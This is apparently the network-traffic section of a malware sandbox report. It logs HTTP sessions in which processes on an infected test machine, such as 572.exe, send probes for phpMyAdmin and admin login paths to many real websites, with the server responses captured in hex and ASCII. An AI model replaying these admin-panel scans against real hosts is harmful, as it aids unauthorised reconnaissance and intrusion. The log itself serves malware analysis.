                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
553 | 192.168.2.6 | 49904 | 104.22.74.220 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:12.597103119 CET | 167 | OUT | GET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mojadovera.sk
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:12.725399971 CET | 338 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://mojadovera.sk/pma/
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd6b0c1e53de-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
554 | 192.168.2.6 | 49912 | 45.60.0.44 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:12.602091074 CET | 169 | OUT | GET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: m.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:12.825048923 CET | 931 | IN | HTTP/1.1 302 Redirect
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.codere.com.co/pma/
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 151
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: visid_incap_2786379=hlpIXcn9RyeS5pqQjLHvrXzDwGUAAAAAQUIPAAAAAADprIzRk3UO2rMvvlyroBMr; expires=Tue, 04 Feb 2025 10:21:14 GMT; HttpOnly; path=/; Domain=.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: nlbi_2786379=qQ7OL9ri/xfPwc9vaJQkpgAAAAAT6+z8Xi/STIi/imJ8KXK7; path=/; Domain=.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: incap_ses_1816_2786379=GmwLPGm/8ysfgRA+arozGXzDwGUAAAAAWc95nFYQh4VkaUEfADF5kQ==; path=/; Domain=.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                X-CDN: Imperva
                                                                                                                                                                                                                                                                                                                                                                X-Iinfo: 44-17307771-17307561 PNNy RT(1707131772394 1) q(0 0 0 0) r(2 2) U24
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 6d 2e 63 6f 64 65 72 65 2e 63 6f 6d 2e 63 6f 2f 70 6d 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://m.codere.com.co/pma/">here</a></body>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
555 | 192.168.2.6 | 49905 | 104.255.105.79 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:12.610148907 CET | 178 | OUT | GET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: signin.rockstargames.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.732676983 CET141INHTTP/1.0 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://signin.rockstargames.com/pma/
                                                                                                                                                                                                                                                                                                                                                                Server: BigIP
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
556         192.168.2.6  49871        87.233.198.20   80                4004  C:\Windows\explorer.exe
Timestamp                           Bytes transferred  Direction  Data
Feb 5, 2024 12:16:12.623770952 CET  184                OUT        GET /admin.php HTTP/1.1
Host: idp.uitgeverij-deviant.nl
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:12.818062067 CET  121                IN         HTTP/1.1 302 Found
content-length: 0
location: https://idp.uitgeverij-deviant.nl/admin.php
cache-control: no-cache


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
557         192.168.2.6  49919        3.161.136.2     80                524   C:\Users\user\AppData\Local\Temp\572.exe
Timestamp                           Bytes transferred  Direction  Data
Feb 5, 2024 12:16:12.625106096 CET  181                OUT        GET /phpMyAdmin/ HTTP/1.1
Host: accounts.binance.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:12.726754904 CET  581                IN         HTTP/1.1 301 Moved Permanently
Server: CloudFront
Date: Mon, 05 Feb 2024 11:16:12 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Location: https://accounts.binance.com/phpMyAdmin/
X-Cache: Redirect from cloudfront
Via: 1.1 f4a9c912221b840a5f27fb82db198fd0.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: ATL59-P4
X-Amz-Cf-Id: Qq6N2-GLYtbafd-AjQJEClsm5E3m3KhqlokWvx3pwz26Z9PWnNiBjw==
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
558         192.168.2.6  49721        124.237.208.37  80                524   C:\Users\user\AppData\Local\Temp\572.exe
Timestamp                           Bytes transferred  Direction  Data
Feb 5, 2024 12:16:12.641943932 CET  168                OUT        GET /admin HTTP/1.1
Host: pan.baidu.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:13.001400948 CET  1280               IN         HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 05 Feb 2024 11:16:12 GMT
Etag: W/"62650964-3feb"
Logid: 8900821477649888728
P3p: CP=" OTI DSP COR IVA OUR IND COM "
Server: nginx
Set-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;
Set-Cookie: BAIDUID=338AE0F115629B5ECE6D8E5A1004A3BC:FG=1; expires=Tue, 04-Feb-25 11:16:12 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Powered-By: BaiduCloud
Yld: 8900821477649888728
Yme: ZIGW/y8rX0QMaTUDUmr/tGtIovoZVAD0qgpNwySEne+xE0x0ZK/5Y6tb3A==
Transfer-Encoding: chunked
Feb 5, 2024 12:16:13.001460075 CET   5   IN   Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Feb 5, 2024 12:16:13.010809898 CET   5   IN   Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Feb 5, 2024 12:16:13.211913109 CET   1280   IN   HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Etag: W/"62650964-3feb"
                                                                                                                                                                                                                                                                                                                                                                Logid: 8900821477649888728
                                                                                                                                                                                                                                                                                                                                                                P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BAIDUID=338AE0F115629B5ECE6D8E5A1004A3BC:FG=1; expires=Tue, 04-Feb-25 11:16:12 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: BaiduCloud
                                                                                                                                                                                                                                                                                                                                                                Yld: 8900821477649888728
                                                                                                                                                                                                                                                                                                                                                                Yme: ZIGW/y8rX0QMaTUDUmr/tGtIovoZVAD0qgpNwySEne+xE0x0ZK/5Y6tb3A==
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked


Session ID   Source IP   Source Port   Destination IP   Destination Port   PID   Process
559   192.168.2.6   49920   3.134.125.175   80   524   C:\Users\user\AppData\Local\Temp\572.exe
Timestamp   Bytes transferred   Direction   Data
Feb 5, 2024 12:16:12.647785902 CET   183   OUT   GET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: 3fba-180-252-166-236.ngrok.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:12.771877050 CET   314   IN   HTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://3fba-180-252-166-236.ngrok.io/pma/
                                                                                                                                                                                                                                                                                                                                                                Ngrok-Trace-Id: 4e87a26e1d5f36604aab9226b6488a88
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 78
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 33 66 62 61 2d 31 38 30 2d 32 35 32 2d 31 36 36 2d 32 33 36 2e 6e 67 72 6f 6b 2e 69 6f 2f 70 6d 61 2f 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <a href="https://3fba-180-252-166-236.ngrok.io/pma/">Temporary Redirect</a>.


Session ID   Source IP   Source Port   Destination IP   Destination Port   PID   Process
560   192.168.2.6   49936   170.114.52.2   80   524   C:\Users\user\AppData\Local\Temp\572.exe
Timestamp   Bytes transferred   Direction   Data
Feb 5, 2024 12:16:12.660207987 CET   167   OUT   GET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: gitam.zoom.us
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:12.808171034 CET   1003   IN   HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 134
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://gitam.zoom.us/pma/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=QRCPfZLumCOrUjC3J2vQvHQ3msXKvHDMUjyFhxAAtBM-1707131772-1-AfJ69FjPjbE+Yvy+geeVq8Q/zepcWpfemU9DKrKoKXETKa+X7V490iBHlNwaDsYZ1EMVp+ViSJoXrCv1JCgh/5U=; path=/; expires=Mon, 05-Feb-24 11:46:12 GMT; domain=.zoom.us; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MvbGpH%2FjptdQjGjvwHO34owE4wneO790jnel10yryINvZBwuSes%2BvL6kNvA0ifHvqXZWn%2BfP6BHT2l6LEm48HQfB025kYoG%2BAA%2FiVdWNFSe%2Fn1owR0KqnJRUMpRPDwo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd6b7acfb08b-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


Session ID   Source IP   Source Port   Destination IP   Destination Port   PID   Process
561   192.168.2.6   49937   162.159.135.232   80   524   C:\Users\user\AppData\Local\Temp\572.exe
Timestamp   Bytes transferred   Direction   Data
Feb 5, 2024 12:16:12.660649061 CET   170   OUT   GET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:12.786185980 CET   938   IN   HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://discord.com/admin.php
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OsCmUWKS5snfiU3Ndad%2BIyV8grTNQ0JT%2BlIhn5W28Z%2BkzbhUAFVxG%2Fbetw6o0gsVfupW49Rfl99DhypDwbDWHupEBbDv5r%2B6XupovMwSIXytqovtGv%2F4KWQuaVjc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=401e12dfda5cd3645c7fd99b35f8ae9a3549d894-1707131772; path=/; domain=.discord.com; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: _cfuvid=M13HsN5o_wGvp6QRdCmAIS.nrcKvYVZe2oTEllPPbj8-1707131772720-0-604800000; path=/; domain=.discord.com; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd6b7e1f2438-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
562 | 192.168.2.6 | 49762 | 36.255.71.45 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:12.677614927 CET | 176 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: instructory.net
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:13.045938969 CET | 150 | IN | HTTP/1.1 302 Found
Date: Mon, 05 Feb 2024 11:16:17 GMT
content-length: 0
location: https://instructory.net/phpMyAdmin/
cache-control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
563 | 192.168.2.6 | 49767 | 103.90.225.70 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:12.683357954 CET | 168 | OUT | GET /pma/ HTTP/1.1
Host: ngoalongvn.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:13.034038067 CET | 1286 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Mon, 05 Feb 2024 11:16:15 GMT
Content-Length: 1245
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have
Feb 5, 2024 12:16:13.034055948 CET | 119 | IN | Data Raw: 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73
Data Ascii: been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
564 | 192.168.2.6 | 49994 | 44.195.133.145 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:12.721868038 CET | 172 | OUT | GET /pma/ HTTP/1.1
Host: ucv.blackboard.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:12.836885929 CET | 575 | IN | HTTP/1.1 301 Moved Permanently
Cache-control: no-cache="set-cookie"
Content-Type: text/html
Date: Mon, 05 Feb 2024 11:16:12 GMT
Location: https://ucv.blackboard.com/pma/
Set-Cookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74419178944AAED0016459F27E1FD7932EE10F8662CA549F3FD503336620C511FF443E7315D4F16653F0D42A1913B3F30D1;PATH=/;MAX-AGE=900
Content-Length: 175
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.21.4.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
565 | 192.168.2.6 | 49928 | 185.51.191.48 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:12.870779991 CET | 283 | OUT | GET /admin/w/login HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: innovationdevelopment.eu
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: VISITORID=6f23480ee7ffaf87556eb25c893227a7; PHPSESSID=ba0ae7db91a15a20c859a36e9617e7c7
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:13.331842899 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 3575<!DOCTYPE html><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><title>Innome</title><link rel="stylesheet" href="/css/system.css?v=1.808" /><link rel="stylesheet" href="/css/flags.css?v=1.808" /><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black" /><meta name="MobileOptimized" content="width" /><meta name="HandheldFriendly" content="true" /><meta http-equiv="cleartype" content="on" /><meta name="twitter:card" content="summary_large_image"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><link rel="stylesheet" href="http://innovationdevelopment.eu/admin/admin.css?v=1707131772" /><link rel="stylesheet" href="http://innovationdevelopment.eu/admin/_custom_admin.css?v=1707131772" /><link rel="stylesheet" href="//code.jquery.com/ui/1.11.2/them
Feb 5, 2024 12:16:13.331856012 CET | 1286 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: es/smoothness/jquery-ui.css" /><script type="text/javascript" src="//code.jquery.com/jquery-1.11.1.min.js"></script><script type="text/javascript" src="//code.jquery.com/ui/1.11.2/jquery-ui.min.js"></script><script type="text/javascri
Feb 5, 2024 12:16:13.331867933 CET | 1286 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ="text/javascript" src="/js/jquery/jquery.nicescroll.js"></script><link rel="stylesheet" href="/js/jquery/icheck/skins/flat/blue.css"><script type="text/javascript" src="/js/jquery/icheck/icheck.min.js"></script><link rel="stylesheet"
Feb 5, 2024 12:16:13.331880093 CET | 1286 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: white;z-index:5;position:relative;}.box{box-shadow:0px 0px 3px #333333;z-index:5;position:relative;}.info{box-shadow:0px 0px 3px #333333;z-index:5;position:relative;}</style>...[if IE]><script src="http://html5shiv.googleco
Feb 5, 2024 12:16:13.331891060 CET | 1286 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: }});function copyTxt(elem) {var copyText = document.getElementById(elem);copyText.select();copyText.setSelectionRange(0, 99999); /*For mobile devices*/document.execCommand("copy");$('<div>Szveg vglapra helyez
Feb 5, 2024 12:16:13.331901073 CET | 1286 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: lay:inline-block;">12:16:12</b></div><script>var admin_banner_time_int=setInterval(function(){date=new Date();h=date.getHours(); if(h<10) h="0"+h; m=date.getMinutes(); if(m<10) m="0"+m; s=date.g
Feb 5, 2024 12:16:13.331912994 CET | 1286 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e_fps" style="z-index:1000;left:0;top:100px;position:absolute;background-color:black;color:white;"></span></div> <script>(function() {setTimeout(function(){$('#admin_bing_bg_wrapper').fadeIn(1000);},500);setTimeout(fu
Feb 5, 2024 12:16:13.331926107 CET | 1286 | IN
